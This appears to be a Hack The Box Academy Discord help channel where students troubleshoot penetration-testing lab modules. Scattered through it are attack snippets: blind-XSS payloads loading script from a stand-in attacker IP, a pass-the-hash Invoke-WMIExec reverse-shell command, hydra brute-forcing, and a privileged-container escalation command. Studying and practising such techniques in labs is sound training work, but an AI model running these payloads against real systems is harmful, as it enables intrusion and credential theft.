for Password Attacks - Credentials huniting in Network Shares's password is a pain in the a would You be expected to do this long and tedius of reading most passwords and trying credentials in the CPTS

can anyone help me with API Attacks Broken Object Property Level Authorization Second question? i saw the hint and i dont get where should i get the ID to type on this endpoint api/v1/customers/orders/items

Module: Introduction to Windows Evasion Techniques
Section: Static Analysis

I created the malware and copied it to C:\Alpha\Static as per the instructions, the log.txt shows it evaded detecion, yet there's no flag.txt file being created.

I reset the lab and it's still the same

have u completed the web attacks module?

#modules message

Yes

you can DM me

I can help

Sorry

Now I can

I can help

DM me

I can

dm

in file inclusions module, everytime i try to send the payload on spawned machine i always get this error (tried other browser and even via terminal too), but i can access it via curl in wsl, anyone knows why?

Do you have a role that can create anything?

While writing notes, how long does a module usually take you? Because while yes writing notes helps me retain more information in the long run, it makes it soooo much longer to finish a module (requiring several days for each one)

is that normal?

completely normal

the estimated module time is to be taken with a grain of salt

a grain <> a ton

but yeah, some modules will be faster than the time shown, some slower. Everyone learns at their own pace 💚

its not the speed that matters, but how much info you retain

Hello, i'm stuck on Firewall and IDS/IPS Evasion - Hard Lab in module Network Enumeration with NMAP
This is the question

Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I've found the ports ||22,80,and_some||, and the 3rd port running|| ib<snip>b2||.
I can't get the version in any way.
The command im running ||sudo nmap 10.129.72.163 -p<pott> -Pn -n --disable-arp-ping --source-port 53 -v -T2 -sV || Please give me a hint.

Module Active Directory BloodHound - SharpHound - Data Collection from Windows
Lab Machine not spawn

same here

Oh my gosh. Apparently, the lab is not stable. A third lab change helped. The same command did not work in two cases (TIMEOUT).It randomly worked after the third reboot of the lab. It's a shame if this happens on certification exams.

I am currently in the Password Attacks module working on the AD and NTDS, but I can't get Kerbrute to read the useernames file that I created from Username Anarchy.
I imagine it's something simple that I'm missing on this, since I can't find anyone else dealing with this, but can someone idiot check this? I've checked my syntax against the lesson, and the step by step solution, but I'm not able to see where I'm going wrong. I even changed my file name from "username.list" to "username.txt" to see if that was the problem, tried putting the file path to the file to see if that might've been the problem (file is in the same folder as Kerbrute, which is where I am)

Don't you need to specify what type of an attack you are performing ? the "userenum" more specifically @minor bear

......I didn't even notice that I was missing userenum. Let me check

Yep, that was it. I knew it was something simple that I was missing.

Hey, I am new to this and am stuck on Junior Cybersecurity Analyst - Linux Fundamentals. The two questions it keeps telling is wrong is Which kernel release is installed on the system?(Format: 1.22.3) I used uname -r and got 6.12.32-amd64. For the answer I used 6.12.32 and 6.12.32-amd64 which it is saying is incorrect. The other question is asking What is the name of the network interface that MTU is Set to 1500? I see there are two showing 1500 ens3 and tun0 but it is also stating both are incorrect. oh and i used ip link show as the command to pull up the information. Any help would be greatly appreciated.

did you ssh into the target machine? (spawn instance isn't the target, it's the in-browser attack box)

That I did not. I completely skipped that part and went to the questions and started answering. I am going to try that Thank you.

#modules message

linked to question so I’m not reposting it over and over 😄

Hi I am at
Module Name: Introduction to Windows Command

Section Name: Skills Assessment

Question: What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

What I've tried: I have looked at logon failures, but every user account which is in the logs is not the valid answer. And there a several with a similar number of failed logins. What can I do?

Hi everyone, I am facing some technical difficulties.

Module: Getting Started
Sectione: Nibbles - Initial Foothold

I have started a instance and got the IP. I am able to access the http://<IP-address> page. But not able to access http://<IP-address>/nibbleblog/ page.

I have also changed my VPN server and also cleared history in my browser. I tried curl http://<IP-address> which was working fine. But curl http://<IP-address>/nibbleblog/ is not.

I got an email saying my learning streak was in danger even though i completed it and did the amount of lessons needed. Did any one else get that email?

Hello
This is DcSync section of Active Directory Enumeration & Attack Module!
The idea is simple,I am going to perform DcSync attack against adunn user utilizing both windows Ms01 machine and also linux machine as my attack host,since I need linux host to run secretsdump.py
The problem is,I can successfully connect to my windows machine,but I can't connect to linux machine with given credentials through ssh
Have you encountered this problem while doing lab?

By the way I can't install secretsdump.exe module which is essentially the compiled version of secretsdump module for windows,as I do not have internet connection on my windows host

Make sure you are using those credentials for SSH, as the credentials at the bottom of the lab are for RDP. When you spawn that lab, there should be two instances. One is for RDP and the other for SSH. The host ACADEMY-EA-ATTACK01 should be your SSH host and the ACADEMY-EA-MS01 should be the one you RDP into.

Yeah I've used exactly those credentials for ssh connection

You can DM.

#modules message

linked to question

Hey guys, for the Pivoting skills assessment for the CPTS, I'm having trouble figuring out how to transfer a file from the Windows machine in the first pivot back to my attack host. Any suggestions?

Basic approach is to transfer it first to the pivot box and then to the attack host.

True, but the pivot host is a linux box with python3 installed, so I tried starting a python http server and sent a post request from the Windows machine, but it ultimately didn't work and returned "Unsupported Method ('POST')"

Yep, you can't place (POST) files with a simple http.server.
Maybe search the net for a python server script that accepts PUT so that you can place a file.

hmmm perhaps

Another option is to base64 encode / decode if it's not too big of a file.

Or if you have RDP access you can mount a folder with xfreerdp (/drive:) and use the GUI to copy-paste.

xfreerdp has the /drive: option

thanks!

oh its too massive for base64 but I always try that when I can because going fileless is so satisfying

that's the one, thank you!

#modules message

linked to question

you can only install powershell modules that exist within the default windows store (this is a storage space that exists, not the windows store that goes and downloads things)

if you want to load a third-party module, you'll need to download and transfer it over

Where is the help thread?

I’m stuck on a problem

Well this is the help thread for modules

@waxen totem Do you have experience with process injection

This for a particular module? if not we can't help you

did anyone come across the HARD LAB in the Footprinting module? I eventually completed it, but I don't understand one thing (that I had to google): when I got Tom's ssh private key and logged into the server, there was nothing useful for finding the flag. how could I think about mysql? it wasn't showing up as an available port during the nmap scan

DACL Attacks II - Skill Assessment - Last Question

To compromise the DC we Link a GPO to the Site (Default-First-Name-Site) using Tangui, his permission is shown in the screenshot. My question is how does this effect the DC? The host isn't in that container described.

Figured it out, that was displaying computer located at which OU i just switched that to computers in which site

https://tenor.com/view/chatgpt-ai-zzz-sleep-you-do-it-gif-3039038605926785931

anyone doing the Password attacks - Pass the Hash - skill assignment for the last question "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt." I already rdped into the machine earlier with the credentials provided I started the netcat listener on the machine and did what the module taught, e.g., PS c:\tools\Invoke-TheHash> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e {encoded value}" however Im not getting the reverse shell back on the machine :/

any ideas would be much appreciated

Hey, can anyone help with HTTP Misconfigurations - Skills Assessment - Hard?

I could triger myself promo to admin but it is not trigerred by any "virtual" admin?

hello, I'm currently doing footprinting --> IMAP / POP3 but I'm struggling to connect to IMAPS service, I'm using the command openssl s_client -connect 10.129.42.195:imaps and after I'm using the command to login with the provided credentials I don't receive any response back from the service ? Can someone help me to understand what's going wrong ? Thanks.

I dunno if lab is broken or am I missing something?

Linux Privilege Escalation - Miscellaneous Techniques: How do I fix this error?

./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell)

either compile the binary on the target or transfer the library onto the target

I believe it shows up in history

The script will run smoothly once you have modified all HTTP requests.

iirc 2x GET Request + 2x POST Request

tnx!

Hey Guys, im currently doing the Detection and Analysis Stage (Part1) of the Incident Handling Process Module.
Its asking for the username who executed the Mimikatz Tool.
I am pretty sure i have the correct one which should be the sourceUser. Is there anyone that has a tip, is this a known Validator Problem?
https://academy.hackthebox.com/module/148/section/1367

Attacking Common Services Skill Assessment - Medium

I was not able to get a foothold by enumerating any serviced i found through the scan nmap -sC -sV <ip> , then i ran a complete nmap scan without any scripts or version scans, nmap -p- <ip>

Stats: 2:06:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 85.29% done; ETC: 00:00 (0:21:48 remaining)

Now it has been running for over 2 hours, still ongoing !!!

Yeah that's expected, you told nmap to run the default script set from the scripting engine. ofc it's gonna take a long ass time.

i didnt, the default script requires the -sC flag i didnt provide any flag

i clearly mentioned i only did nmap -p

oh i thought you said you did nmap -sC -sV, my bad

no problem

things generally don't take that long with htb though, they don't want you scanning/bruteforcing for more than like 30 mins or so

the hard and easy labs were easy but i am stuck on medium one like ugh meanwhile everyone is saying it is the easiest one of all t~t

ikrrrr

Took 60 seconds for me with -sC and -sV

But my Documentation & Reporting RDP is acting up

Cant even open Obsidian on it for the Skill assessment

Probably heavily dependent on time of the day

Doing Web attacks module ---> xxe and the CDATA section. Anyone managed to get it to work or done it because I literally did it all step by step and still cannot get the flag

DM

Hi I have this specific problem with SOC Analyst path, especially with the module "Introduction to Malware analysis: Debugging". I did everything and still getting the message "sanbox detected". Maybe I missed something, but I am stuck here and I have no idea what is wrong. Can anybody help me with this?

Shells & Payloads - The Live Engagement

Once opened, students need to click on ||"Manager App"|| and provide the credentials removed:removed (which were provided under "Host-1 hint" in the module's section):

This is terrible imo

How would I get there without the provided credentials? No common password list I used contains the password

check the desktop of the jump host :)

the module is above tier 0; please don't spoil info from it

Oh ok sorry. Where can I get help for my question ?

you can ask it without revealing module information such as specific headers. Most people do AEN blind if they're doing the CPTS track, and it's not impossible to figure out what you need to do.

Okay, I understand. But throughout my preparations I was told that everything I would need for the exam was in the path, and frankly I can't find mentioned anywhere that specific kind of attack. Was there some specific area I missed because honestly I couldn't have guess the method used by myself although I thought I was prepared enough to do it.

AEN is part of the path. Verb tampering is covered in the "Web Attacks" module which is part of the CPTS path.

AEN != the exam

but yes, verb tampering is taught -- maybe not this specific thing, but it is taught, the exam itself is also not copy/paste from the path

so be prepared to do a little bit of legwork to get the reward

That specific thing, TRACK, is actually covered in the Web Attacks module too. Look at the Web Enumeration & Exploitation section.

with the same header you asked about

oh sorry that was from AEN i was reading lol

but yeah, AEN is part of the path

verb tampering is covered in web attacks

Ok got it ! Of course I wasn't expecting to get a copy/paste and was prepared to do some thinking to connect the dots but strictly in the context of what the path teaches, I didn't know I was supposed to do extra research to get there since I was repeatedly told, "everything is in the path". Thank you for the answers.

Yes I know, but as MarcieLee said, not this thing specifically, but I guess you're right, I do undertsand that AEN teaches extra things by itself. Anyways, thank you both for your assistance. I'll try to go deeper and do my best next time.

Is anyone willing to offer some guidance on the LLM Output Attacks skills assessment? Been stuck with the imagebot for days

thanks a lot, Imma try it

Hello, anyone knows how to use bloodyAd to find User-Force-Change-Password rights ?
It is not showing when I do get writable but bloodhound and dacl.py shows it

||I got stuck of sliver skill assessment question 1 because of that||

hello guys, i'm at the module "Setting up" and I've strugling with the virtualbox, when i run the proxmox instance, when i go to install it the screen became all black and dont happen anything, someone could help me, please?

Proxmox isnt meant to be run in a vm, you also dont need to follow setting up 100%

Think of it more as a reference guide, than a manual of operation

just to be sure so, theres is a problem if this happen in a parrotos instance too?

when i actually install the os

No, as parrotOS is meant to be run as baremetal or vm.

ProxMox is, itself, a container manager. That's why it has issues within a virtual machine environment

thx!

https://academy.hackthebox.com/module/67/section/626 this does not seem to work as intended as sarah permission when i login was already elevated even tough i just spawned the box

Hi everyone,

I am going through the skills assessment for Windows Lateral Movement, and I was able to gain access to the server using the Arturo account. However, there is no flag on the desktop. I’m not sure whether this is a content issue or if I am missing a step. Could you please provide some guidance?https://academy.hackthebox.com/module/263/section/3095 second question

You aren't looking in the right place

isnt supposed to be the desktop?

it is...

not there tho

you're not looking in the right spot. it's on his desktop 100%.

so i fell into some habit role then ....

you can send me a dm if you need a bigger nudge

for password attack skill assessment, my kali vm cannot rdp as hwilliam, but pwnbox is able to .
is this intended behaviour?

Any help please? Still stuck here

@elder prawn please refrain from spoiling skill assessments (there was a password in your image). Also possible it's your vm config

any idea what config could be the issue?

am able to authenticate to smb though, which is rather strange

possibly the rdp libraries used by nxc, try other rdp solutions

i tried remmina and xfreerdp3, what other options do i have?

try adjusting your tun0 mtu

tried adjusting my mtu, didnt work. but my openvpn connection is indeed horrendous so i'll take that as an answer, thanks for the help

Did you manage to do it?

Credential Hunting in Network Shares

As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

and there is fake credential what i can do ?

does some slides have mistake answer ?
which makes incomplete chapter

man im currently solving second lab in info gathering module and im stuck can anyone help me out

Can somebody explain me the difference between anonymous and null authentication / bind in smb / ldap? I am so confused

well null auth is a form of anonymous auth, another form of anonymous auth is guest auth

No null is not anonymous . They are different things

Nxc smb target -u " " -p " " might work where as Nxc smb target -u " guest" -p " " wouldn’t or the opposite

And I see people reference null and anonymous auth but I am configured what is what

this is what he is trying to say

Not really, anonymous authentication is a collective term for the authentications which aren't tied to user identities like: null authentication or guest authentication. So all null authentication is anonymous but not all anonymous authentications are null.

Credential Hunting in Network Shares
As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

i have get so many password HTB_@cad3my_lab_W1n19_r00t!@0 i have found it in temp
MyAwesomePassword! its was crpyted by AES

i have use the logiciel they use but nothing work
there is fake crendetial too

Hi guys, please is anyone of you has completed vulnerability skills assessment?

i don't think there is module named vulnerability, are there

probably you mean vulnerability assessment

Yes

Have you completed

ask your question directly, mention which section and in which question are you stuck, also mention what you tried and what you found

I remember having to follow things very closely to get it to produce some flags. I can take a look at what you're trying. Just send a DM.

Yes, you have to follow the steps precisely. DM me if you still need help.

Hey Guys, im currently doing the Detection and Analysis Stage (Part1) of the Incident Handling Process Module.
Its asking for the username who executed the Mimikatz Tool.
I am pretty sure i have the correct one which should be the sourceUser. Is there anyone that has a tip, is this a known Validator Problem?
https://academy.hackthebox.com/module/148/section/1367

There is only one Alert with Mimikatz Tool executed so i guess i am looking at the right alert. In it there are only two options if the module is asking for "domain/user_name." either the sourceUser or the targetUser, but more likely the sourceUser.
Both wont get accepted as a answer not even in all possible variations of Capital and lowercase letters that would make sense

its blocking me from completing the Junior Cybersecurity Analyst Path and driving me crazy 😂

hello, can you please check your dms if you have time

hi guys i stuck at file upload attacks/skills assessment. i think the intended way to find the upload path is to use a svg image with xml code to read the /contact/upload.php. i tried but im not able to trigger xxe execution: either i get the code as text in base64 back when i use jpg or jpeg as mime type or when i dont use a mime type i get only an 500 server error. pls can someone help me?

Base64 can be decoded :)

as i said i only get the text back, no execution

Well... it can lead to further information such as where files get uploaded to, and if any modification is done to filename when you upload

Is anyone else experiencing issues connecting to targets? I have completed like 20 modules with no problems but not it seems nothing is working. I can't connect neither on the pwnbox (sometimes it works but very unreliable) and literally never on my vm even if I connect with the VPN. What is going on???

or is everything normal with you guys?

okay i repeat: i used svg with xxe payload. as return i get my payload in base64. the xxe did NOT get triggered!

Hello how do I go from here

To configuring the DNS server here

What module is this? Need context @shut wraith

This is the bloodhound module. We need to configure the DNS server in order to use bloodhound from a non-domain-joined windows machine

But I dont know how to setup the DNS server

ncpa.cpl -> right click the nic -> properties -> highlight ipv4 -> click properties

Legend

i don't like using the gui so i just use the run command

I mean I think this is a really valuable exercise

Because in real engagements its common to drop a laptop on site

And then you obviously have to configure the DNS server

i think usually dns servers get found through dhcp automatically

generally in the environments i see they run a dc with dns services running, and none of the endpoints have a hardcoded nameserver

Interesting, this tells me that you usually get access through a tunnel or RDP to their workstation

Should I still use impacket bloodhound even though ipsec said rusthound is better

Anyone have any notes for using rusthound

rusthound-ce -u $USERNAME-p '$PASSWORD' -c All --domain $DOMAIN.TLD --zip  --name-server $DC-IP

Thanks

why doesn't SNMP have a proper explanation but the other terms do ?
https://academy.hackthebox.com/beta/module/77/section/726

Hey this doesn't work

I just generated my data with this command in APTLabs.

rusthound-ce --version
---------------------------------------------------
Initializing RustHound-CE at 19:34:50 on 01/18/26
Powered by @g0h4n_0
---------------------------------------------------

rusthound-ce 2.4.7

https://docs.rs/rusthound-ce/latest/rusthound_ce/index.html

I know this is all very basic and elementary stuff, but I am more proud of this than I am any other academic achievement in my life. I know I just essentially typed "Hello World" but this means so much to me and I am so excited and grateful to be here and continue learning - thank you!!

https://academy.hackthebox.com/achievement/2299640/289

https://tenor.com/view/wow-boy-thumbs-up-all-might-my-hero-academia-gif-16616071

hi guys i stuck at file upload attacks/skills assessment. i think the intended way to find the upload path is to use a svg image with xml code to read the /contact/upload.php. i tried but im not able to trigger xxe execution: either i get the code as text (and not the result) in base64 back when i use jpg or jpeg as magic bytes or when i dont use a mime type i get only an 500 server error. pls can someone help me?

have you checked the erratum?

i think marcilee wrote something about the file upload

i've done it couple days ago. You do need mime type to read the source of that file. Have you identified what mime types are passing through filtering?

to get the reverse shell you need to send the command $cmd =iex(download.string....) ;invoke-Reverse

i would say the instructions are abit unclear

Hi guys, i'm doing this module:
Detecting Windows Attacks with Splunk

but when I entered the Zeek section, the webapp seems to not load at all. "connection reset by peer". I was even able to RDP to the server and try localhost:8000 but i also get "connection reset by peer". Is this module broken?

i tried jpg and jpeg and gif. jpg and jpeg did work. i wanted to try a magic byte for svg image too but there is no magic byte specially for svg pictures. i did not tried more types because you have to set the bytes all manually... perhaps i should still try png..

i completed a bunch of tier 2 modules with the yearly subscription. will i still have access to these modules once my subscription ends?

you don't want to guess the right mime type. You want to identify them with intruder. There will be just few and it will take you no time to read that file. Read the hint for that question and go step by step. Try using normal image file

If you complete a Module with an access-based subscription, you will still have the ability to go back and review that module, even after your plan ends. Additionally, you are still rewarded with Cubes when you complete Modules with an access-based subscription.

TLDR; yes

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions#h_2c84055db6

Only 4 more weeks

Can anyone help me with fetching marlin's passowrd on smtp section on attacking common services

Command: hydra -l 'marlin' -P ./pws.list -f 10.129.111.69 pop3

i believe you need to input marlin's full email address?
hydra -l marlin@inlanefreight.htb
thats what i have in my notes at least

tried but it didnt work

reset the lab and got flag

this might be true

why is this error when uploading json files in bloodhound

Hi all, I am stuck on Q2 of the DACL Attacks II skill assessment. I have identified possible attack paths, but i am missing one step. Can I DM someone for a nudge?

did you upload it as a zip file? i have sometimes experienced when you upload computer.json files

I tried to upload both json and zip file

sometimes clearing the database and the load them one by one works

what kind of collector did you use?

netexec

i think nxc still runs with bloodhound-python collector
try running it with bloodhound-ce-python and its gonna work

bloodhound-python ingestor is the lagacy collcetor and works with lagacy bloodhound

correct me if i am wrong never used nxc to collect bloodhound data tbh

I will try to do it with python one and will reach you soon

Hello, I'm working on the intro to digital forensics module. I completed the first question reasonably well, and leveraged the hash to identify the answer to the second question via VT. I didn't like it, but I couldn't find anything in the memory modules via Velociraptor. Ran many captures and it's hit or miss what's available. Now I'm on the registry key question, but would like some support on the best way to identify the C2 IP and also a lead on how to identify the registry key for persistence given the constraints of Velociraptor.

Also, any tips to getting a response? I noticed some questions go unresponded. No shade, just learning how things work here in effort to not waste anyone's time. Are there office hours or something of the sort that I'm missing? Noob keywords I should steer clear of?

No tips, it's totally voluntarily that people reply here

If you're experiencing technical issues, support is there to help, but content wise, it's up to someone to be willing to help 🙂

ok, makes sense. thank you

WiFi penetration testing tools techniques: Skills assessment machine you have to RDP to doesn’t have the tools compiled correctly. Try it using your “solutions” for eaphammer or air-hammer. Going on three days of this garbage

What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).

can someone tell the answer to this question?

module name: Android Fundamentals

i typed stringFromJNI() but its giving me incorrect answer

??

Can anyone please help me to understand why could I have troubles pinging academy targets from pwnbox?

Why can't I connect via RDP to the machines today?

I can ping the machine (slow response, but a response)

Not every machine responds to a ping

Machine apparently didn't start correctly, a reset fixed it

I want to solve tasks from Pentest In A Nutshell - Linux System Enumeration section, I can't connect using ssh, started troubleshooting and I see no ping or 75% of packets loss

Well, if you have 75% packet loss, then the machine responds to ping.

Then the problem must lie elsewhere.

Someone here knows why I cant connect to the assessment page of the XSS Module ? "http://targetip/assessment/" I am connected to the VPN but the side is not loading. I already changed the VPN and terminated the machine multiples times.

All other pages are loading but the assessment is not loading

@acoustic owl Maybe you can help me ?

Which XSS module are you referring to? Was a port specified for the target? Check http or httpS?

Python one as well as rusthound also worked thank you sir

sure thing 🙂

HTB continues to push me to be infinitely more resourceful. Really appreciate the guidance. I've found my way past this challenge and on to the next one! Cheers!

It is the Cross-Site Scripting (XSS) module for the Web Penetration Tester Job Role Path

No specific port mentioned

I can connect to the ip and other paths like /phishing but not to the /assessment path

Works fine for me.
Try restarting the target.

Crazy ... I restarted the target multiple times now, switched VPN, rebooted kali. I can connect to ever other page but the assessment is not loading. curl also not loading

Hi, i need help with htb academy room. For the rooms where i am supposed to host a server to get a hit, doesnt seem to workout for me, can anyone please help me in troubleshooting the same?

Room? What is a room? (Htb doesnt use the term room); it helps to provide the module name and section name

session hijacking- blind xss, blind xxe etc

all the module assessments where we need to host our own server to get a hit. idk if it makes sense

Reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

sudo php -S 0.0.0.0:80

you can connect to the server if you write in the .js paylaod your ip ("ip a" to get the ip)

Okay thanks

thats for cookie stealing

yes

blind xss methodolody is - first to confirm on which field its present

Yes you need to find the payload which works

so for that we simply host a server and then <payload with vpn's private ip in fileds> n click send, it shd trigger right

i should get a hit

but i am not getting anything

yes

try other payload

payload is correct, i tried with write up too

doesnt work

so i am assuming something is wrong

so i would want someone to have a look at it

Are you specifying the ip properly in your payload

yeah, the vpn's pvt ip:port number on which the server is hosted

you need your ip

Well yes, the 10.10.x.x ip

I forget the ranges that get assigned

yeah those only

write "ip a" in the console and look at tun0: the first ip

yes, thats vpn assigned pvt ip

Thats the ip which need to be in the payload

no port

just ip

tried this too. no luck

is there a problem if i use wsl?

i dont understand why is it not working

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement('script');a.src='http://OUR_IP';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

you tryed all this payloads ?

i tried the first 4

One of those is right. I did the exercise few hours ago

thats what im following the write up, still it is not working

same thing is happening with other modules which requires hosting a server of our own

I msged you private

hey did you manage to get this?

You can send a DM if you are still stuck on this question.

The Windows Privilege Escalation - Citrix Breakout VM is so slow

Its not possible to even log in in <5 Minutes

The Pivoting Module it just gets stuck at this point without returning the flag. I tried using proxychains but no response, I tried even from the jump host but same. Any leads will be helpful

guys I'm having issue with ad lab 1 while using multi handler can I dm someone please

I ran man dconf-service

Like the initial foothold?

Is there anyone here who has completed the vulnerability assessment, specifically the Nessus skill assessment question 3? What is the highest criticality plugin ID from the Windows authenticated scan?

its a 6 digit long number

@strange aspen okay thank you

np

@strange aspen, may I ask you to help me directly whenever I face a challenge?

I completed attacking common services easy but I was wondering|| if the webshell is accessible when you navigate to the target in the browser ? In my case I uploaded the webshell using mysql db and used curl to get a reverse shell via the webshell||

Yes, its still technically accessible

guys can anyone pls help me out?

seomtiems boxes are too laggy i cant even rdp in. are boxes usually unstable nowadays or is it just me

On attacking common services medium if I am trying to scan all ports how do i get results more quickly without sacrificing accuracy
is specifying T4 better than giving --min-rate
what are my options ?

Yes I tried different msfvenom payloads also tried using different methods but it didn’t work

Advanced SQL Injections - Skills Assessment
Anybody i can DM ?

Hi, anyone has connection issues for Attacking Common Applications? I can't connect to the boxes at all via VPN, the parrotbox works for 30 seconds and the box just dies after that. Pinging shows that the box is dead, I can't get any progress with it.

The boxes from other modules work fine though

hello, im on the skill assessment in the information gathering module (CWES) and im trying to solve the 3rd question

i found the hidden admin directory but when i try to navigate to it, it says "site can't be reached". And i also tried doing it through curl but was met with the same problem

PS: im able to go to /robots.txt but i just cant get into the admin directory

If it's about the first question, you can dm me. I'm stuck at the second one

Can anyone please help me regardin sql injection fundamentals, Skill Assesment section. I’m stuck. Please guide me or any update walkthroughs out there?

Please can anyone of you me to solve vulnerability assessment: nessus skills assessment, typically question 3. What is the highest criticality plugin ID for the windows_authenticated_scan

Hi everyone,
i would like to report that in the exercice for the Containers chapter in the Linux priv esc module in the pentester path (link : https://academy.hackthebox.com/module/51/section/1588), the target machine keeps crashing after image list or image initiation (ex. lxc init alpine privesc -c security.privileged=true), even after respawning the target multiple times and waiting, it just keeps crashing.
i even tried to run linpeas.sh on it to find a diff vector, and it crashed again lol
Any help would be much appreciated ❤️

try changing vpn regions and/or reaching out to support if the env keeps crashing

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

thxx

currently doing Attacking common services - easy lab, but can't find foothold, i am kinda sure that SMTP can be used to enumerate users but getting nothing out of it honestly, tried manual user enumeration and also used smtp-user-enum with higher wait seconds: 20 but didn't get anything, tried all three methods of user enumeration

@fathom pendant i saw you helping others by saying try 15+ wait time, but it didn't worked out so maybe i though the lab is broken

any help would be appreciated

nevermind, i was supposed to use another domain, but i don't know how we are supposed to guess it

You can send me a DM.

can i sent you DM on attacking common services skills assessment

Can anyone give me a nudge on Advanced XSS and CSRF Exploitation - XSS Filter Bypasses

I bypassed the filter (checked with alert(1) when i view the comments)

I am using a standard exploit for exploit.htb server, but when opening the comments and checking the developer console, it says that /home.php or /view.php do not exist
||When i change the link from /view.php to filterbypass.htb/view.htb then i get CORS errors, which i can't fix||

Am i on the right track or? It feels like i'm missing something simple but i'm stuck

Sure

Hello, is there a way to filter Labs based on content / specific skills ? I realy liked the XSS Module in the Academy but would like to practice XSS more.

can someone help me with the wordpress module skill assessment